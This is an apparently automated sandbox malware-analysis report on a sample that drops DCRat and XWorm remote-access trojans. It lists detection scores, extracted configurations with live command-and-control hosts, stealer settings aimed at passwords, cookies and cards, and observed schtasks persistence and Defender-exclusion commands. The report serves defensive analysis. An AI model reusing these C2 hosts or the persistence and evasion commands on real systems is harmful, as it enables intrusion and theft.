Source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"H\":\";\",\"y\":\"$\",\"J\":\"^\",\"5\":\"&\",\"B\":\"_\",\"L\":\">\",\"I\":\"#\",\"a\":\"(\",\"U\":\".\",\"C\":\"`\",\"d\":\"!\",\"6\":\")\",\"x\":\"-\",\"c\":\"*\",\"4\":\",\",\"o\":\" \",\"S\":\"@\",\"0\":\"<\",\"h\":\"%\",\"M\":\"~\",\"z\":\"|\"}", "PCRT": "{\"v\":\";\",\"Q\":\"<\",\"6\":\"%\",\"B\":\"#\",\"R\":\"*\",\"U\":\"$\",\"Z\":\"(\",\"V\":\"~\",\"L\":\".\",\"3\":\">\",\"F\":\"|\",\"x\":\"-\",\"s\":\"@\",\"0\":\",\",\"J\":\")\",\"h\":\"!\",\"p\":\"`\",\"k\":\"_\",\"I\":\" \",\"T\":\"&\",\"H\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-CW0MLhmPnzDpkkOuZEHa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "H2": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "T": "0"}
Source: 2.0.javaclient.exe.ec0000.0.unpack | Malware Configuration Extractor: Xworm {"C2 url": ["light-liable.gl.at.ply.gg"], "Port": "10314", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: a1013249.xsph.ru | Virustotal: Detection: 12%
Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | ReversingLabs: Detection: 87%
Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Virustotal: Detection: 68%
Source: C:\Componenthost\providerreviewdhcp.exe | ReversingLabs: Detection: 87%
Source: C:\Componenthost\providerreviewdhcp.exe | Virustotal: Detection: 68%
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Virustotal: Detection: 68%
Source: C:\Program Files\Windows Mail\WmiPrvSE.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Mail\WmiPrvSE.exe | Virustotal: Detection: 68%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | Virustotal: Detection: 68%
Source: C:\Recovery\csrss.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\csrss.exe | Virustotal: Detection: 68%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | ReversingLabs: Detection: 87%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Virustotal: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Virustotal: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Virustotal: Detection: 67%
Source: C:\Users\user\cmd.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\cmd.exe | Virustotal: Detection: 68%
Source: cougif6lqM.exe | ReversingLabs: Detection: 78%
Source: cougif6lqM.exe | Virustotal: Detection: 59%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Componenthost\providerreviewdhcp.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Joe Sandbox ML: detected
Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe | Joe Sandbox ML: detected
Source: C:\Users\user\cmd.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Mail\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Joe Sandbox ML: detected
Source: cougif6lqM.exe | Joe Sandbox ML: detected
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: light-liable.gl.at.ply.gg
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: 10314
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: <123456789>
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: <Xwormmm>
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: XWorm V5.6
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: USB.exe
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: %Temp%
Source: 2.0.javaclient.exe.ec0000.0.unpack | String decryptor: JavaClient.exe
Source: cougif6lqM.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Componenthost\providerreviewdhcp.exe | Directory created: C:\Program Files\Windows Mail\WmiPrvSE.exe
Source: C:\Componenthost\providerreviewdhcp.exe | Directory created: C:\Program Files\Windows Mail\24dbde2999530e
Source: C:\Componenthost\providerreviewdhcp.exe | Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
Source: C:\Componenthost\providerreviewdhcp.exe | Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e
              Source: cougif6lqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe, 00000003.00000003.1330292606.0000000006981000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe, 00000003.00000000.1328766355.0000000000F33000.00000002.00000001.01000000.00000007.sdmp, DCRatBuild.exe.0.dr
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_00F0A5F4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_00F1B8E0
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2AAA8 FindFirstFileExA,3_2_00F2AAA8

Networking

Source: Malware configuration extractor | URLs: light-liable.gl.at.ply.gg
Source: Malware configuration extractor | URLs: http://a1013249.xsph.ru/@=UGO0gTOkVjZ
Source: global traffic | TCP traffic: 192.168.2.9:49715 -> 147.185.221.17:10314
Source: Joe Sandbox View | IP Address: 147.185.221.17
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: a1013249.xsph.ru
Source: global traffic | DNS traffic detected: DNS query: light-liable.gl.at.ply.gg
Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: javaclient.exe, 00000002.00000002.3755345710.0000000003271000.00000004.00000800.00020000.00000000.sdmp, providerreviewdhcp.exe, 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process information set: 01 00 00 00

System Summary

Source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\Desktop\cougif6lqM.exe | Code function: 0_2_00007FF886EE0A21
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Code function: 2_2_00007FF886ED7936
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Code function: 2_2_00007FF886ED86E2
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Code function: 2_2_00007FF886ED1689
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Code function: 2_2_00007FF886ED1FC5
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0857B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F170BF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0407E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F2D00E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F31194
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F202F6
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0E2A0
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F03281
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F16646
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F027E8
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F137C1
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F2473A
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F2070E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0E8A0
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0F968
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F24969
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F16A7B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F13A3C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F2CB60
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F20B43
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F15C77
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F1FDFA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F13D6D
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0ED14
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0DE6C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F0BE13
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F20F78
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F05F3C
Source: C:\Componenthost\providerreviewdhcp.exe | Code function: 7_2_00007FF886EA3545
Source: C:\Users\user\cmd.exe | Code function: 29_2_00007FF886EB3545
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Code function: 38_2_00007FF886ED3545
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Code function: 40_2_00007FF886ED3545
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe | Code function: 40_2_00007FF886EE1597
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Code function: 41_2_00007FF886EB3545
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Code function: 41_2_00007FF886EC1597
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Code function: 42_2_00007FF886EE1597
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Code function: 42_2_00007FF886ED3545
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 00F1E28C appears 35 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 00F1E360 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 00F1ED00 appears 31 times
Source: providerreviewdhcp.exe.3.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: cougif6lqM.exe, 00000000.00000002.1362339384.0000000003161000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamejavaclient.exe4 vs cougif6lqM.exe
Source: cougif6lqM.exe, 00000000.00000002.1362339384.0000000003161000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs cougif6lqM.exe
Source: cougif6lqM.exe | Binary or memory string: OriginalFilenameJavaClientBeta.exe4 vs cougif6lqM.exe
Source: cougif6lqM.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: cougif6lqM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cougif6lqM.exe | Static PE information: Section: .rsrc ZLIB complexity 0.9925503756830601
Source: javaclient.exe.0.dr | Static PE information: Section: .rsrc ZLIB complexity 0.9923369193989071
Source: javaclient.exe.0.dr, StlEUbFdJZHX9iqp9y0vGOLHru7O9CqwhAtkNxmmtIzacgnk1V1a8HJAfPU1Th8PIJHJOg.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: javaclient.exe.0.dr, mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: javaclient.exe.0.dr, mRMv10HbZpwLFNjCwmoHBKxrw0NcMSjvzittQ7G5wQNBNo8SaleZ11W6JDVJ762DAuQ5l0.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PVStjT4hn5scdS4lfYS.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uPfSZV53W3JdoE5DHk8.cs | Cryptographic APIs: 'TransformBlock'
Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uPfSZV53W3JdoE5DHk8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PVStjT4hn5scdS4lfYS.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uPfSZV53W3JdoE5DHk8.cs | Cryptographic APIs: 'TransformBlock'
Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uPfSZV53W3JdoE5DHk8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, wxlCxPkYywwxbY5Yf0k.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, wxlCxPkYywwxbY5Yf0k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, wxlCxPkYywwxbY5Yf0k.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, wxlCxPkYywwxbY5Yf0k.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: javaclient.exe.0.dr, ZPc799oFDlHD7nzPTpU9mHApETofsGEBQ5rjH5.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: javaclient.exe.0.dr, ZPc799oFDlHD7nzPTpU9mHApETofsGEBQ5rjH5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@45/32@2/1
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F06EC9 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 3_2_00F19E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Componenthost\providerreviewdhcp.exe | File created: C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe
Source: C:\Users\user\Desktop\cougif6lqM.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cougif6lqM.exe.log
Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Users\user\Desktop\cougif6lqM.exe | Mutant created: \Sessions\1\BaseNamedObjects\sOYAmJHoa0nevRYo5
Source: C:\Componenthost\providerreviewdhcp.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\116774478796360b622de653c1d04ef9f7d2f9c3
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Mutant created: \Sessions\1\BaseNamedObjects\MdauxdZIJGVjqlHW
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
Source: C:\Users\user\Desktop\cougif6lqM.exe | File created: C:\Users\user\AppData\Local\Temp\javaclient.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: sfxname (3_2_00F1D5D4)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: sfxstime (3_2_00F1D5D4)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: STARTDLG (3_2_00F1D5D4)
Source: cougif6lqM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cougif6lqM.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Componenthost\providerreviewdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cougif6lqM.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\cougif6lqM.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cougif6lqM.exe | ReversingLabs: Detection: 78%
Source: cougif6lqM.exe | Virustotal: Detection: 59%
              Source: unknownProcess created: C:\Users\user\Desktop\cougif6lqM.exe "C:\Users\user\Desktop\cougif6lqM.exe"
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\javaclient.exe "C:\Users\user\AppData\Local\Temp\javaclient.exe"
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Componenthost\providerreviewdhcp.exe "C:\Componenthost\providerreviewdhcp.exe"
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f
